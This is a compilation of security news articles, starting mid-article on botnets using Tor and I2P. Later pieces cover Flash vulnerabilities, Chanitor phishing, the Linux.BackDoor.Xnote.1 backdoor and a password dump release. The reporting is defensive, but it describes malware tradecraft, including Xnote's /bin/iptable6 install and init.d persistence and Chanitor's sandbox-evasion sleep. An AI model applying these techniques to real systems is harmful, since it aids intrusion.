I2P is another anonymizing network used to hide the location of the control servers and make the botnet resilient the C&C to the law enforcement. Also recently, a new version of the popular black market Silk Road, Silk Road Reloaded, migrated on I2P, probably because at this moment there is the conviction that it is more secure than Tor. It happens now … new Dyre banking trojan variant A few days ago, the experts at TrendMicro spotted a new variant of the DYRE /Dyreza banking malware with new propagation and evasion techniques. The malware is spread through malicious emails containing the Upatre downloader disguised as a fax or the details of a package delivery, but once it is executed, the download drops the new Dyre variant, which in turn downloads the WORM_MAILSPAM.XDP worm. The propagation technique implemented by the cyber criminals is very effective. The worm exploits the Microsoft Outlook email client present on the victim’s machine to spread spam emails with the Upatre downloader attached to them. The emails aren’t sent to the victim’s contacts, instead they are sent to email addresses passed by the C&C server. Once the emails are sent by the worm, it deletes itself. This variant of Dyre uses hard-coded addresses for its IP addresses. The malware authors also implemented backup mechanisms for command and control infrastructure that rely on a URL provided by the malware’s domain generation algorithm (DGA) or a hard-coded address of a C&C server hidden on the Invisible Internet Project (I2P) network. Figure 10 – Dyre I2P In this case, the I2P network is used as a supplementary way to control the botnet, a choice to make it more resilient to attacks. Conclusion Security experts believe that malware authors will continue to exploit anonymizing networks like Tor and I2P. Analyzing the timeline of malware detections made by principal security firms, cyber criminals have been increasing the adoption of such networks since 2012. Figure 11 – Malware in the Deep Web (Security Affairs) Malware authors will exploit the Deep Web basically as a backup mechanism for their botnet and to make them more resistant to various kinds of attacks operated by law enforcement. References Skynet, the potential use of Tor as a bulletproof botnet - Security Affairs | Security Affairs OnionDuke: APT Attacks exploited the Tor Network | Security Affairs New crimekit Atrax exploits Tor, mines Bitcoin and much more | Security Affairs Detected 64-bit ZeuS banking trojan using Tor network | Security Affairs http://securityaffairs.co/wordpress/27885/cyber-crime/bifrose-uses-tor.html http://blogs.cisco.com/security/talos/cryptowall-2 http://malware.dontneedcoffee.com/2014/07/ctb-locker.html http://securityaffairs.co/wordpress/26763/cyber-crime/critroni-ransomware-use-tor.html http://securityaffairs.co/wordpress/31993/cyber-crime/cryptowall-ransomware-2-0.html http://securityaffairs.co/wordpress/21795/malware/tor-based-chewbacca-infect-pos.html https://community.rapid7.com/community/infosec/blog/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit https://www.defcon.org/images/defcon-18/dc-18-presentations/D.Brown/DEFCON-18-Brown-TorCnC.pdf https://blog.gdatasoftware.com/blog/article/botnet-command-server-hidden-in-tor.html http://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html http://contagiodump.blogspot.it/2014/11/onionduke-samples.html?m=1 http://securelist.com/blog/events/58184/the-inevitable-move-64-bit-zeus-enhanced-with-tor/ http://securityaffairs.co/wordpress/17601/cyber-crime/botnet-behind-tor-traffic-surge.html [ulr=http://resources.infosecinstitute.com/hunting-malware-deep-web/]Source

Social media platforms provide fertile ground for communication without borders, so there is actually no limitation as to the potential benefits that these platforms can offer to you. This is why so many Internet users have been registering for new accounts on Facebook, Twitter, Pinterest and Google+ on a daily basis, opening just another window of communication and online interaction with friends, relatives or even mere acquaintances and total strangers. Most people own more than a couple of accounts on social media sites and use them fairly regular (even every day, as we have mentioned above). They connect with others and share personal information, videos and pictures of them and their loved ones. They also share their thoughts and anything else worthy of attention. Due to the significant increase in the social media accounts and their gravity, there have been major incidents of hacking. This means that many social media accounts get hacked, and this is not a rare phenomenon to comment on. On the contrary, many people have to confront with such a negative consequence of the importance of social media nowadays; social media is an easy and simple way for hackers and other malicious intruders to have their way and penetrate the systems of many other people (the followers of the person whose account has been breached) at once. Let’s start by looking into the signs that reveal the hacking, in order for you to be on alert and know when something is wrong with your account. Signs of a Hacked Social Media Account Although it can be difficult to realize that your social media account has been compromised, there are definitely signs that should raise an eyebrow and motivate you to look deeper into the root of the problem. Some of the most frequent signs that reveal something is not great about your account include the following: You instantly observe likes and follows that you had nothing to do with You have your status updated, although you have not shared anything There is ad flood on your page (unusually extensive) You have trouble logging in Private messages are posted on your behalf Spam posts are posted on your behalf You have new friends that you do not recall adding Others inform you of sharing malicious content on your wall If you notice some of these signs, you had better check it out and not sit idly. It is more than likely that your account has been hacked and you need to act promptly and effectively. How do accounts get hacked? In order for you to know how to be safe on social media, you need to know where the threat lies. Indeed, hacking a social media account is a lot easier and simpler than you would have expected it to be. There are sophisticated menaces nowadays lurking in the dark and targeting Internet users, so as to penetrate their system and access their sensitive data. These are the major methods for hacking a social media account being used by cybercriminals: Password exposed Phishing Malware installed Sites being hacked Third-party apps or services breached As you can see, there are multiple routes to getting the desired effect and it is true that today the threats that appear online are far more advanced and sophisticated than a few years ago. So, your defensive line should be equally strong. Below, we are going to have a look at what you need to do if your social media account gets hacked. What to do if your social media account has been hacked Even if hacking has occurred, you should not panic. There are several steps that you can take in order for you terminate the threat and reset the protection layering on your computer. Just follow the guidelines being provided below in avoidance of any further damage. With dedicated work and attention, you will be able to regain your social media account and have nobody else threatening its integrity and uniqueness. Of course it is crucial that you change your password immediately and that you use a solid password that has never been used by you anywhere else. The common strategy of using the same password on all of your accounts (email, banking accounts and social media platforms) can be catastrophic! Delete the apps that appear on your social media account and that you know nothing about. If you have not installed anything, you do not need it on your account. Equally important for safe social media is to set the default email address of your accounts and check that it is available for you to reach. Make sure that your antivirus is up-to-date and schedule a thorough scan for any threats on your computer. If you use social media on multiple devices, have them all scanned. Report spam posts, as they can hide malware and other threats. If a friend of yours clicks on them he might get in trouble and have his account hacked, too. You cannot allow this vicious circle to go on indefinitely. Think twice before clicking on anything. New malware can crawl up to your account and therefore you need to be vigilant and eliminate such threats. Use secure platforms for paid messaging. It is imperative that you buy the ads that you want right from the platform and not have a third-party getting in the way. Last but not least, make sure that the online information of yours is safe. Do not reveal information that is linked to your account and do not expose too many details from your personal life online. How to prevent hacking on social media We have already outlined what needs to be done after having realized that your social media account has been breached. Nevertheless, it is essential that you know what you ought to do, in avoidance of repeating the same mistakes. You ought to enhance your security layering and allow nothing to penetrate the safety of your online navigation. There are some fundamental details that will make a huge difference for you, and that will offer great power and effectiveness against malware and other threats. First of all, you need to be cautious with your password. Besides choosing to use a solid password that is hard to guess, you need to be really scholastic about others knowing. Even if you use social media at work, you cannot risk having the password of yours in use when leaving your office. Always log out and be twice as scholastic with shared computers. Do not share your password with others, even with your best friend or your better half. This is private for a reason and you should never underestimate the risk that you take when letting someone else know your private information. Apart from that, you ought to introduce yourself to two-factor authentication. This is an extra weapon that you can use to enhance the protection offered to you via your password. With two-factor authentication, you eliminate the threat of someone else breaching your social media account (or any other account, apparently). There is another step that has to be followed and another piece of information for someone else to breach, prior to gaining access to your social media account. So, this is a great weapon that can be put into effect and act like an armor for you online. Bottom line Safer social media can be really hard to achieve, however, if you are concentrated on what you do and if you focus on the guidelines that we have provided, you will see that you can recover from a potential hacking of your social account without any delay or frustration. Of course, you can follow these simple guidelines even if you haven’t been hacked – prevention is better than the cure, right? Feel free to enhance your social media account protection right away. This will keep all dangers at bay and shield you against the malicious intent of others on the web. Remember that social media platforms can be truly helpful, provided that you know how to use them and what safety precautions you ought to take. Source

Oh, Adobe Flash. I knew you well, starting from when you were known as Macromedia Flash in the late 1990s. The dynamic web content you provided me was amazing. Streaming video over 56k would’ve been a major test of my patience, hence YouTube didn’t launch until 2005. But the games… Oh, the games! They were fun. Wait fifteen minutes to download, then five minutes of amusement could be had before it got tiring. Webmasters loved the razzle dazzle of Flash applets even more than JavaScript applets for tacky animated menus and the like. Back when websites had “Best viewed with Netscape,” or “Best viewed with Internet Explorer” icons on their home pages, some web developers really enjoyed one upping each other in needless Flashiness. “Look ma, this ain’t GeoCities no more!” As web developers started to emphasize function over gimmickry, they started to focus their energy on interesting and useful web apps and streaming video as opposed to taking the sentiment behind the old HTML <blink> tag way too far. With Flash, the possibilities seemed endless. If you could make a very good SWF applet, people really appreciated it, especially once most people had Flash plugins in their web browsers. And of course, Flash was necessary for YouTube. YouTube launched the same year Adobe bought Macromedia, 2005. YouTube was such a phenomenon that Google had the good sense to buy it a year later. Adobe is good at developing creative tools, however proprietary they are. What they’re not good at is security. No bloody way! Security bugs are inevitable in all applications from developers both big and small. But, they’re way more common in Adobe Acrobat and Adobe Flash than is typical for similar applications. One of the things I habitually do in my security hardening routine for both personal and professional client PCs is uninstall Acrobat, and replace it with another PDF viewer, such as Foxit Reader, when the machine I’m working on runs Windows. Even though the end user doesn’t realize that I’ve given them a more secure application to open PDFs in, they always appreciate how their new application patches without popups, and gives them a better designed GUI, better in-browser functionality, and an overall better user experience. I’m really happy to be able to say that now I can do the same thing to Flash as I do to Acrobat. Except, I don’t have to install another application to replace it. All I’ve got to ask an end user is, “do you ever go to YouTube?” They’ve always said yes. The really computer illiterate end users don’t know what Flash is, nor do they know that they sometimes view YouTube videos as an embedded applet on a webpage that’s not hosted at youtube.com. Asking them if they enjoy other websites that use Flash is an exercise in futility. “Huh? Do I use Google or Foxfire?” (Why oh why do they call Firefox “Foxfire?” Explaining to them the difference between the Google search engine and the Google Chrome web browser has made me ruin my manicures here and there.) But I could usually assume that they needed Flash for YouTube most of the time. A few years ago, they really needed it for games in Facebook, as well. The first nail in the coffin was mobile. The late Steve Jobs, although I strongly dislike the guy, was correct when he said, “Flash has not performed well on mobile devices. We have routinely asked Adobe to show us Flash performing well on a mobile device, any mobile device, for a few years now. We have never seen it.” Although Adobe really wanted to port Flash to mobile platforms, that effort was never successful. It was never available for iOS. It was available at times for Symbian, Palm OS, and webOS. It was available for some devices running Android versions 2.2 through 4.0.4. It never really seemed to catch on, once smartphones and tablets became the primary way for consumers to enjoy content from the Internet. W3C started working on HTML 5 in 2004. It was usable for me to play around in starting in 2010. But I’m more of a web page developer than a web app developer, so my web development was focused on standards compliance and cross browser and device compatibility rather than creating nifty things with the canvas element. Nonetheless, the introduction of the <video> tag made it a lot easier to embed video without Flash than ever before. And other new tags and functions in HTML 5, combined with sophisticated CSS and JavaScript use, rendered Flash unnecessary for dynamic apps, as well. HTML 5, when used by a competent developer, works just as well on mobile as it does on desktop platforms, and that was apparent well before HTML 5 became officially stable on October 28th, 2014. In fact, I can’t think of a more successful and widespread beta release off the top of my head. Unless you directly worked in web browser and engine development, October 28th would’ve been just another Tuesday. Adobe announced that they had given up on developing Flash for mobile in November 2011. That well predated HTML 5’s stable release. In addition to games and other web apps using open standard alternatives to Flash, YouTube started to make HTML 5 compatible videos available in January 2010, via WebM and H.264. Also, there are native mobile apps for watching YouTube videos outside of the web. So, the thorough acceptance of cross platform open standards, especially HTML 5, combined with everyone and their grandma using mobile devices and Adobe’s struggle with it, sealed Flash’s doom. Then, on January 27th of this year, YouTube announced that HTML 5 video is now default in Chrome, Internet Explorer 11, Safari 8, and the latest Firefox releases. If your browser uses one of the same rendering engines, such as the latest stable versions of WebKit and Trident, you’ll probably experience the same. A Brief Summary of Adobe’s Security Problems This is by far not a complete summary of all of the security problems Flash (and Acrobat) has had, but I’ll explain some of the major ones. In 2007, an Adobe (Acrobat) Reader bug exposed the local filesystems of users’ computers to anyone who knew how to exploit it. Trojan Adobe Flash Player and Reader updates started to become prevalent in 2008. It’s been such a problem that when I see an update popup on a user’s machine, I assume it’s malicious until I determine otherwise. So, that’s been a huge problem for consecutive years now. How come all kinds of other applications, open and closed, from developers of all sizes can patch without popups users have to interact with, but Adobe can’t manage to do that? That’s a massive trojan vector, and there are two disastrous sides to that coin. The vast majority of end users lack my expertise, particularly in malware. A Flash or Reader update popup could be a trojan. Sometimes end users have had experience with Adobe trojans already, so someone like me may have advised them to exercise caution when they see such a popup. But the popup could necessitate interaction for a legitimate and very necessary security patch. So with end users unable to determine whether or not a popup is a trojan, not interacting with it could be the less secure rather than more secure thing to do. In 2009, Symantec’s Internet Security Threat Report explained how Adobe, with Flash and Reader, had one of their most insecure years ever. Adobe’s Chuck Geschke was tremendously arrogant when he was interviewed by John Paczkowski about that. Paczkowski: “Both Apple and Microsoft have said publicly now that Flash has issues with reliability, security, and performance. Do you think those complaints are legitimate?” Geschke: “I think they’re old news. Go to our website and read the actual facts about Flash. We enumerate the facts about Flash there as we see them. They may have a different set of facts that they believe are accurate. It’s up to you to decide.” Ummm, Mr. Geschke… Facts are never subjective by their very definition. Facts are facts, period. You sound like a bloody Scientologist. “Today, I feel like 2 + 2 = 5. It just feels right to me, but your mathematics professor may have a different set of facts they believe are accurate.” Here are the facts. This is what Symantec’s 2009 report actually said, and I hold them in much higher esteem than I do Adobe: “In 2009, Symantec documented 321 vulnerabilities affecting plugins for web browsers. ActiveX technologies were affected by 134 vulnerabilities, which was the highest among the plugin technologies examined. Of the remaining technologies, Java SE had 84 vulnerabilities, Adobe Reader had 49 vulnerabilities, QuickTime had 27 vulnerabilities, and Adobe Flash Player was subject to 23 vulnerabilities. The remaining four vulnerabilities affected extensions for Firefox… “Among the vulnerabilities discovered in 2009, a vulnerability affecting both Adobe Reader and Flash Player was the second most attacked vulnerability. This was also one of four zero-day vulnerabilities affecting Adobe plug-ins during 2009. Two of the vulnerabilities were in the top five attacked vulnerabilities for 2009. Additionally, Adobe vulnerabilities have been associated with malicious code attacks such as the Pidief.E Trojan.” Ouch! And Adobe’s position as one of the most insecure major software vendors ever didn’t cease in 2009. It still isn’t “old news,” Mr. Geschke. Malicious PDFs were used to sucessfully attack Rackspace, Adobe, and Google in 2010. A remote access bug was discovered in Flash in 2011. When properly exploited, one could acquire full control of an affected client machine. Flash Player made it to the top of Symantec’s list of most exploitable plugins in 2012. In October 2013, Adobe was attacked, revealing the sensitive data of 2.9 million users. The sensitive data affected included credit card and debit card information. The same day, YouTube announced default HTML 5 video, January 27th, 2015, Adobe had to release a security patch for two really major Flash vulnerabilities. Independent security researcher Kafiene discovered vulnerability CVE-2015-0311. It allowed Flash to be used as a vector for malicious code injection which could, once again, give complete control of an affected machine to a blackhat. A security researcher named Bilou discovered CVE-2015-0312. It was very similar to CVE-2015-0311, it also enables remote code injection. And of course, with Adobe being Adobe, barely a week passed before fifteen vulnerabilities had to be addressed in a patch that released on February 5th. Yet again, these vulnerabilities enable remote malicious code injection and execution. If you’re still using Flash in Windows, OS X, and GNU/Linux, this is what you must know about eighteen additional CVE listings: “Users of Adobe Flash Player for Windows and OS X should update to Adobe Flash Player 16.0.0.305. Users of Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.269. Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.442. The Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, will automatically update to version 16.0.0.305.” I can safely assume that we’ll continue to learn about really major vulnerabilities that pertain to Flash and Reader for as long as those products continue to be developed by Adobe. I base that assumption not only on Adobe’s reputation and their tendency to take a head in the sand approach to security, but also on Adobe’s patch management style. Their patches address vulnerabilities that are near the surface of their applications, rather than the really deep vulnerabilities at the center of their really old code bases. Way too much of the code is unchanged from the 1990s. I’d love for a security firm with much greater resources than I have to do a really thorough penetration test of the most recent versions of Flash and Reader for Windows, OS X, and GNU/Linux. The reported findings would probably require a forest’s worth of pulp if printed on paper. So, yes, security vulnerabilities can be found in products from all developers. But Adobe is much worse than the norm. Alternative PDF viewers and creators are available for pretty much all mobile and desktop platforms. And open web standards such as HTML 5 have made Flash obsolete. Heck, I even use GIMP instead of Photoshop. Here’s my advice. Whether you’re enterprise or a consumer, get Adobe out of your abode. Now you can do it for content creation and consumption. And it’s easy. References Still using Adobe Flash? Oh well, get updating: 15 hijack flaws patched- Shaun Nichols, The Register Still using Adobe Flash? Oh well, get updating: 15 hijack flaws patched • The Register YouTube flushes Flash for future flicks- Simon Sharwood, The Register YouTube flushes Flash for future flicks • The Register YouTube now defaults to HTML 5 <video>- Richard Leider, YouTube Engineering and Developers Blog YouTube Engineering and Developers Blog: YouTube now defaults to HTML5 <video> Another day, yet another Adobe Flash patch. Because that’s how we live now- Iain Thomson, The Register Another day, yet another emergency Adobe Flash patch. Because that's how we live now • The Register Adobe has an epically abysmal security record- Jose Pagliery, CNN Money Adobe has an epically abysmal security record - Oct. 8, 2013 Adobe says hackers accessed data for 2.9 million customers- James O’Toole, CNN Money http://money.cnn.com/2013/10/03/technology/security/adobe-hack/index.html?iid=EL Thoughts on Flash- Steve Jobs, Apple.com https://www.apple.com/hotnews/thoughts-on-flash/ Why You Should Ditch Adobe Shockwave- Brian Krebs, Krebs on Security http://krebsonsecurity.com/2014/05/why-you-should-ditch-adobe-shockwave/ YouTube says HTML5 video ready for primetime, makes it default- Ron Amadeo, ArsTechnica http://arstechnica.com/gadgets/2015/01/youtube-declares-html5-video-ready-for-primetime-makes-it-default/ The tooth gnashing you hear is from Flash users installing a new 0day patch- Dan Goodin, ArsTechnica http://arstechnica.com/security/2015/01/those-teeth-gnashings-you-hear-are-flash-users-installing-a-new-0day-patch/ How secure is Flash? Here’s what Adobe won’t tell you- Ed Bott, ZDNet http://www.zdnet.com/article/how-secure-is-flash-heres-what-adobe-wont-tell-you/ Adobe issues emergency Flash update for Windows and Mac- Dara Kerr, C|Net http://www.cnet.com/news/adobe-issues-emergency-flash-update-for-windows-and-mac/ Source

Black hats are flinging supposedly free licenses at enterprises in a bid to get malware on corporate networks, security bod Martin Nystrom says. They wrote malware that was slightly neurotic in its bid to evade detection and would make use of the Tor network to receive stolen data. The Cisco threat defence man said realistic phishing emails claiming approval for Microsoft licenses were personally-addressed to some of its customers foisting a link to where the malware would be downloaded. He said the malware would search for sandboxes, a tool common with researchers, and put itself to sleep for up to half an hour to avoid detection. "The email is very similar to the real email Microsoft sends," Nystrom said, adding analysis of the malware required a good measure of skill and resources. "The malware seemed to know it was being analysed (by Nystrom) and exited after 20 seconds without doing anything. "[it] sleeps to wait out automatic sandbox analysis before starting to communicate on the internet." Attackers served a copycat Microsoft Volume Licensing Service Center page hosted on hacked WordPress sites where a low-detection Chanitor malware variant would quietly download seemingly as a volume license. Once on a victim machine it would detect at least the three most popular sandboxes and use a sleep command to remain dormant for about 30 minutes. It would later alter a file structure to make some sandbox systems fail. Chanitor also probed a series of IP addresses before checking if Tor network connections were possible. Nystrom said the attack was typical of a trend to target corporate staff with smarter phishing emails, and of the continued cat-and-mouse game between white hat probing and black hat evasion. Source

Technology is easier than ever to use—tablets could come with stickers that say “suitable for ages 8 to 88,” and that probably wouldn’t be inclusive enough. Making stuff, however, remains daunting. To build software, you have to know how to program. To build hardware, you have to know how to solder. Or at least that’s how it feels most of the time. But we’re starting to see what user-friendly making looks like. IFTTT lets anyone link apps and services by stringing simple recipes together. LittleBits brings Lego-like simplicity to electronic tinkering. A new DIY kit called Mesh combines elements of both. Pairing a few simple sensors with a straightforward tablet interface, it lets anyone experiment with connected hardware ideas of their own. Mesh, created by a small team of Japanese engineers from Sony, aims to make hardware hacking instantly accessible. Three domino-sized “tags” comprise the hardware: an accelerometer, a button, and an LED. They communicate wirelessly with a tablet app, which serves as a Quartz Composer-style visual sandbox for linking the hardware tags to various actions. Drag the icon for the accelerometer and the icon for the LED icon into the app’s workspace, draw a link between the two with your finger, and that’s it. Now, when you jostle the accelerometer, the LED turns on, wherever in the room it happens to be. Move the link from the LED to an “email” icon, and the accelerometer sends a preset note to your inbox instead. The projects Mesh’s developers show off are, admittedly, silly. In one, we see how putting the accelerometer tag on a free weight could trigger an audio message encouraging you to keep pumping iron. This is not exactly the most compelling vision for our effortlessly programmable future. But when Takehiro Hagiwara and Shingo Yoshizumi, two of the Sony engineers working on the project, brought a prototype set by for a demo, it was easy to see the promise. Hagiwara said the idea was to make inventing intuitive, and it was. While I certainly wasn’t building any sort of elaborate prototype, or, honestly, anything useful at all, the simple act of specifying a behavior on a screen and seeing it instantly adopted by the tags was kind of magical. Hagiwara and company are raising money on IndieGogo to continue developing the platform. Though the examples position it as more of a neat toy at this point, the team has a fourth tag—a general input/out module–that would allow advanced tinkerers to incorporate servos and other hardware. The team also aims to link Mesh to other software and web services, which could open up many compelling possibilities. It would be awesome to have a few cheap, physical sensors that could be linked up to stuff on IFTTT, for example. If nothing else, Mesh is a glimpse of what tomorrow’s creative tools might look like. And rethinking those tools more broadly is relevant to novices and pros alike. Loren Brichter, the programmer behind the original iPhone Twitter app, recently described the state of programming thus: “It’s not like a boat with a couple of holes that we can patch; it’s more like trying to sail across an ocean on a pile of accrued garbage.” “The tools right now are so complicated that it takes all your mental energy just to try and ‘hold’ them,” he said, “so you have nothing left to actually do something interesting.” Source

TJX hacking mastermind Albert Gonzalez scoffed at antivirus tools. He and his cohorts wrote malware specifically designed to evade their detection. One can imagine him laughing as his team of hackers broke into corporate networks using SQL injection attacks and gained administrative access. Then he probably guffawed, Bond villain-style, as he uploaded the malware directly into server memory, and when the corporate networks began happily delivering customer credit card data directly to his servers chuckled all the way to the bank. Gonzalez was perhaps the biggest cyber criminal in history. He was eventually jailed for hacking more than 250 companies, ranging from retailers such as TJX and grocery chain Hannaford Bros through to payment processing company Heartland. He pilfered data from under their noses and cost them hundreds of millions of dollars. Even though many of these firms had antivirus software installed, they didn’t detect what he was doing. Why? Mind the gaps Don’t be mistaken: antivirus software is a crucial part of any security arsenal and every day malware scanners the world over detect and throttle millions of malicious software strains. This is not a category of software that we should live without. Antivirus tools work by scanning both static files and programs running in memory. They use several techniques to try and detect malicious activity. Signature scanning, which looks for known patterns in files, is a well-established method of finding software nasties, as its scanning code runs in memory, looking for potentially malicious activity as it happens. These are solid, reliable tools but when attackers are determined enough, antivirus software alone may not stop them from grabbing your data. The malware industry thrives on zero-day attacks – exploits using obscure or completely unknown vulnerabilities. A hacker smart enough to devise one – and there are plenty – can get past malware detectors. The smart IT manager uses complementary technologies to reduce the risk of attack, and one is to look at the potential delivery channels for malware. Ugly sites One way in which attacks are delivered is via drive-by downloads. Employees visiting legitimate work sites are relatively safe, but when they visit less savoury sites online they run the risk of being infected by rogue JavaScript running in the browser. Web protection software can reduce that risk by blacklisting certain sites or groups of sites. Filtering web access is a good way to reduce the risk of infection by simply prohibiting access to sites that are not necessary for work. It can also be a worthy complement to antivirus software that will attempt to detect anything installed via the browser. This multi-faceted protection is a basic tenet of modern cyber security. Another important vector is email. This has gained huge traction among attackers, who use it for phishing, and in some cases spear phishing targeting specific companies. Attackers can gather information about a company's organisational structure and employees. The list of sources here is endless, ranging from annual reports through to social media posts. These can be used to socially engineer employees to obtain login details or have them open a file containing a zero-day attack. Employee training is all-important here but it must be backed by a technological solution too. All it takes is for one user to open a file or click a link to a fake IT administrator page asking them to enter their single sign-on password as part of a security audit, and you can wave goodbye to the integrity of your network. Big phish The best way to counter threats delivered via email is to choke them off before employees even see them. Monitoring and filtering emails is therefore an important part of any corporate cyber-security strategy. Email can be scanned for viruses, and it can be controlled still further by scanning for known spam signatures and characteristics. This alone can root out the lion’s share of malicious or pestering emails, increasing employee productivity as well as reducing the risk of compromise. Adding blacklists for known bad domains and whitelists for recognised sources, such as business partners and customers, can be an extra-useful technique for locking email down. The further that companies can keep unscrubbed email away from their IT architectures the better. Pre-filtered email streams contain not only infected files but also large volumes of spam, which serve only to clog bandwidth and servers. Having these filtered offsite by a third-party service mitigates the problem, ensuring that only clean communications touch company servers. Patch and mend Even after all these measures have been taken, there is still the chance that a company’s systems can be compromised. The likes of Gonzalez, or the Sony Pictures hackers, are determined assailants. The battle doesn’t stop with web protection or email scanning. Making sure the software running on the network is up to date is an important aspect of any cyber-security strategy so that attackers can’t exploit any of the known vulnerabilities in the average operating system or application. Patch management processes and tools are critical, especially as companies grow larger and IT infrastructures become more complex. Understanding what has been rolled out and when can help IT administrators prevent dangerous holes from appearing in the system. All of these measures, layered onto antivirus software, can help to reduce the risk of a successful cyber attack. Here’s the dirty little secret of cyber security, though: nothing is 100 per cent secure. The key is to make things so difficult for attackers that they decide to move on to easier targets. The way to do that is to layer your defences, using multiple tools and protecting different parts and communications channels of the IT infrastructure. Managing it centrally also gives you a single point of access, helping you not only to quash incidental attacks but also to spot any emerging trends that could indicate a sustained, targeted assault on your company. This concept reflects a long-established military strategy: defence in depth, in which layers wear down an attacker’s ability to mount an offensive. In a modern environment, where companies live and die by their data, don’t rely on a thin red line to protect it all. Source

Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders such as to mount DDoS attacks and to perform a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. Once Linux.BackDoor.Xnote.1 gets in, it checks to see whether its copy is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically. The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body—the string points to the beginning of the encrypted configuration block, then decrypts it and starts sending queries to control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the library zlib to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself. The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives which can include: List files and directories inside the specified directory. Send directory size data to the server. Create a file in which received data can be stored. Accept a file. Send a file to the command and control (C&C) server. Delete a file. Delete a directory. Signal the server that it is ready to accept a file. Create a directory. Rename a file. Run a file. In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor. Source

Twitter has seen a surge in government requests for user information, according to its latest transparency report. The social media platform has seen a 40% rise in the number of requests from governments around the world since its last report, in July 2014. Hundreds came from the government of Turkey, which has previously attempted to ban Twitter. The most requests came from the US government. All of the large internet companies, including Google, Facebook and Yahoo, now release regular transparency reports in order to keep users informed about how much data is shared with governments. It is part of the industry's response to revelations from former National Security Agency contractor Edward Snowden, which pointed to mass government surveillance programs in the US and abroad. "Providing this insight is simply the right thing to do, especially in an age of increasing concerns about government surveillance," Twitter senior manager of legal policy Jeremy Kessel said in a blogpost. Twitter received 2,871 requests from governments across the world asking it to reveal data about 7,144 of its users in the second half of 2014. Just over half (52%) of the requests had been fulfilled, it said. Most of the requests came from the US government - with 1,622 requests. 80% of which were complied with. The Turkish government made 356 requests, putting it second place behind the US. None of its data requests had been complied with, said Twitter, although it did not go into details about what they had been about. The company also saw an 84% increase in government demands to remove content from Twitter. The top three requesting countries were: Turkey (477) Russia (91) Germany (43) In Turkey, these requests tended to focus on claimed violations of personal rights either for citizens or government officials. Prime Minister Recep Tayyip Erdogan blocked Twitter in Turkey in March after an anonymous source posted allegations of government corruption. The ban was overturned in the courts and the service restored. Russia had sent 108 requests for account information since July, according to Twitter. Previously it had not sent any. It had also sent 91 requests for the removal of content, ranging from posts promoting illegal drugs to attempts to suppress non-violent demonstration. "We denied several requests to silence popular critics of the Russian government and other demands to limit speech about non-violent demonstration in Ukraine," said Mr Kessel. In August, Russia passed laws placing restrictions on users of social media. Bloggers with more than 3,000 daily readers were forced to register with the media regulator, social networks were required to retain six months' worth of data on its users and bloggers were not allowed to remain anonymous. Source

A security consultant has published 10 million passwords along with their corresponding usernames in a move he characterized as both necessary and legally risky given a legal landscape he said increasingly threatens the free flow of hacking-related information. Most of the existing corpus of passwords exposed in hack attacks is stripped of usernames, preventing researchers from studying the possible relationship between the two fields. Mark Burnett, a well-known security consultant who has developed a specialty collecting and researching passwords leaked online, said his sole motivation for releasing the data was to advance what's already known about the way people choose passcodes. At the same time, he said he was worried the list might land him in legal hot water given the recent five-year sentence handed to former Anonymous activist and writer Barrett Brown, in part based on links to hacked authentication data he posted in Internet chat channels. "I think this is completely absurd that I have to write an entire article justifying the release of this data out of fear of prosecution or legal harassment," he wrote in a post published Monday night on his blog. "I had wanted to write an article about the data itself but I will have to do that later because I had to write this lame thing trying to convince the FBI not to raid me." Last March, federal prosecutors dropped criminal charges related to links Brown left in two Internet relay chat channels that were frequented by members of the Anonymous hacker collective. The links led to authentication data taken during the December 2011 hack on Strategic Forecasting by members of Anonymous. Before dropping the charge, prosecutors said the links amounted to the transfer of stolen information. Even though the charge was dropped, however, prosecutors still raised the linking to support their argument Brown deserved a long prison sentence. In Monday night's post, Burnett also raised changes the Obama administration is proposing to federal anti-hacking statutes. Many security professionals have said the revised law would outlaw the publication of links to public password dumps even if the person making the link had no intent to defraud. If the people sharing the information have any reason to believe someone might use it to gain unauthorized computer access, critics have argued, they would be subject to stiff legal penalties under the Computer Fraud and Abuse Act. Including usernames alongside passwords could help advance what's known about passwords in important ways. Researchers, for instance, could use the data to determine how often users include all or part of their usernames in their passwords. Besides citing the benefit to researchers, Burnett also defended the move by noting that most of the leaked passwords were "dead," meaning they had been changed already, and that all of the data was already available online. As password dumps go, 10 million is a large number, but it's still small compared to the seminal 2009 hack of gaming website RockYou, which leaked 32 million passcodes, 14.3 million of which were unique. Last year, The New York Times reported that Russian criminals amassed a database of more than one billion passwords gathered from more than 420,000 websites. As Burnett noted, what sets this latest dump apart is that it was made by a security professional with the goal of advancing the public understanding of password choices. Equally noteworthy will be the reaction it receives from prosecutors. Source

